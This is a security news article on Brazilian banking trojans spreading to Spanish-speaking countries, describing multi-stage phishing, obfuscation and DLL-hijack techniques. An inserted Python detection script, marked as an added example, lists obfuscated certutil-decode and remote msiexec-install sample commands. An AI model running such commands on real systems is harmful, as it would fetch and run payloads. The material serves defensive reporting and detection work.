
Brazilian Financial Malware Spreads Beyond National Boundaries

Brazilian Actors Expand Financial Malware Campaigns to Attack Spanish-Speaking Countries

A detailed analysis from security researchers shows how Brazilian financial malware is spreading beyond national boundaries to attack banks in Spanish-speaking countries across South and Latin America, and Portugal and Spain in Europe.

Brazilian hackers are often overshadowed in the media by news about Russian, Chinese, Iranian and North Korean hackers -- but new research from Cybereason suggests growing technical expertise and aspiration stemming from Brazil.

Assaf Dahan, Sr. Director, head of threat hunting at Cybereason, and Cybereason security analyst Joakim Kandefelt, have tracked and analyzed recent campaigns, and have discovered a multi-stage stealthy financial malware campaign that flies under the radar and is difficult to detect (Cybereason used AI-based behavioral detection). The research has now been published.

They also discovered that the campaign is not limited to attacking banks in Portuguese-speaking Brazil, but has widely spread to Spanish-speaking countries. "These countries," note the researchers, "include Argentina, Bolivia, Chile, Venezuela and Spain." Cybereason found earlier samples of Brazilian malware targeting more countries, such as Mexico, Portugal, Colombia and other Latin American countries.

The campaign starts with social engineering and ends with the delivery of a RAT. The RAT seems to be an adaptation of the Delphi_Remote_Access_PC RAT available on GitHub. The GitHub code has no functionality directly related to malware, and Cybereason believes it has been repurposed by Brazilian cybercriminals for their own use.

The campaign uses a multi-stage infection methodology. While this is not a new approach, it remains effective at avoiding detection. It starts with a phishing email, often masquerading as a legitimate business invoice, or a spoofed VIVO email (Brazil's largest telecoms company). This contains a shortened URL or an attachment that fetches a first stage downloader. If an attachment is included, it is usually a PDF file that fires a request to the shortened URL when the user clicks anywhere in it.

This first-stage downloader includes another shortened URL designed to fetch the second stage downloader from a web hosting service such as GitHub, Pastebin, AWS or Dropbox.

The second stage downloader, often masquerading as a Flash or Java update, is usually an obfuscated PowerShell script that fetches the main payload. It sometimes includes functionality designed to create persistence and perform anti-analysis checks. One example supplied by the researchers is described as "a PowerShell script that checks for an existing infection, drops a batch file that checks for values in the registry, drops a .lnk file that points to the aforementioned batch file for persistence and fetches a secondary xor-encrypted payload from the same remote server."

The final payload that steals online banking data from the targeted banks found in the malware configuration is again downloaded from legitimate hosting services. The configuration is either embedded in the payload from the legitimate services, or fetched from a C&C server.

This chained delivery method, using legitimate URL shorteners and web services, makes it difficult to detect a serious anomaly in the victim's network traffic. But the whole process makes widespread use of stealth techniques. For example, many of the first stage payloads comprise an obfuscated script or set of obfuscated commands. 

One example provided by the researchers "uses an obfuscation that gradually builds up its payload." They believe the obfuscation method is adopted from Daniel Bohannon's Invoke-Obfuscation project. "Once PowerShell is executed, the actual downloader payload does not appear in the process' command-line arguments."

The criminals also use Microsoft-signed applications, usually described as living-off-the-land, to further disguise their activities. In one example, a .lnk file spoofed an Internet Explorer shortcut. Once executed, a secondary payload was downloaded and executed using Microsoft's msiexec.

In another example, a .lnk file used Microsoft's Certutil to decode a base64 payload that was itself further obfuscated with carets inserted between almost every other character. Once decoded and deobfuscated, the command downloaded a secondary payload. 
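The two living-off-the-land cases above (msiexec fetching a payload, Certutil decoding a caret-obfuscated one) can be hunted in process command lines. The following is an added example, not code from Cybereason's report or from this article: a Python triage over constructed command lines. The rule names, the caret threshold and the example.invalid URL are assumptions.

```python
import re

# cmd.exe discards unquoted ^ escape characters, so "c^e^r^t^u^t^i^l" still runs
# certutil. Stripping every caret is a simplification (quoted carets are literal)
# that is acceptable for triage matching.
def normalize(cmdline):
    return re.sub(r"\s+", " ", cmdline.replace("^", "")).strip().lower()

def caret_ratio(cmdline):
    return cmdline.count("^") / max(len(cmdline), 1)

CARET_THRESHOLD = 0.10  # assumed cut-off; tune against your own telemetry

RULES = {
    # Certutil used to decode an encoded file dropped on disk
    "certutil_decode": re.compile(r"\bcertutil(\.exe)?\b.*[-/]decode\b"),
    # msiexec installing a package straight from a remote URL
    "msiexec_remote_package": re.compile(
        r'\bmsiexec(\.exe)?\b.*[-/](i|package)\s+"?https?://'),
}

def triage(cmdline):
    """Return the sorted names of the rules a command line triggers."""
    clean = normalize(cmdline)
    hits = [name for name, rx in RULES.items() if rx.search(clean)]
    if caret_ratio(cmdline) >= CARET_THRESHOLD:
        hits.append("caret_obfuscation")
    return sorted(hits)

# Constructed sample command lines (not taken from the report)
SAMPLES = [
    r"cmd.exe /c c^e^r^t^u^t^i^l -d^e^c^o^d^e %TEMP%\a.txt %TEMP%\b.bat",
    r'msiexec.exe /q /i "https://files.example.invalid/update.msi"',
    r"msiexec.exe /i C:\Installers\tool.msi /qn",
    r"certutil -verify cert.cer",
]

def scan(samples=SAMPLES):
    """Map each flagged command line to the rules it triggered."""
    return {s: triage(s) for s in samples if triage(s)}

if __name__ == "__main__":
    for cmd, hits in scan().items():
        print(hits, "<-", cmd)
```

Command-line matching of this kind does not cover the Invoke-Obfuscation case described earlier, where the downloader never appears in the process arguments; that needs PowerShell script block logging or behavioral telemetry.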

The ultimate malware is usually fairly common Brazilian malware known as Banload, Banbra, Bancos, Delf and Spy/Banker.

"Brazilian financial malware," warns the report, "is known for its effectiveness in overcoming multi-factor authentication (MFA), by implementing sophisticated social-engineering tricks to extract SMS codes and other security tokens information, using overlay screens."

The primary malware is executed by a variety of methods. This includes DLL-hijacking techniques "against trusted security vendors, including Avira and McAfee, and trusted technology companies like VMware, NVIDIA, HP, Realtek and Adobe." However, this relatively common method has been evolved by the Brazilian hackers -- splitting the malware payload into two components. One would be a fake DLL that loads encrypted malware into memory, decrypts and executes it. 

The malware payload, however, cannot run without the separate loader. This codependency between the loader and the encrypted payload makes the detection and analysis of the malware harder.

The infections don't end with the financial malware. Cybereason found additional post-infection activity on compromised machines. "In addition to the banking Trojans," write the researchers, "we found that the same campaigns were distributing cryptocurrency miners, infostealers and malware that targets Microsoft Outlook. Malware that targets Outlook is a particular concern since it poses a major risk to organizations worldwide."

The Cybereason research demonstrates the extent to which Brazilian hackers try to hide their activity. It also demonstrates that existing financial malware campaigns have expanded their targets from Portuguese-speaking Brazil to multiple Spanish-speaking countries. This research focuses on specific banking campaigns targeting Portuguese and Spanish speakers, but "it is safe to assume," Assaf Dahan told SecurityWeek, "that there are other Brazilian threat actors targeting other countries as well."

Boston, MA-based Cybereason raised $100 million in Series D funding from SoftBank Corp in June 2017, bringing the total raised to $188.6 million.

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.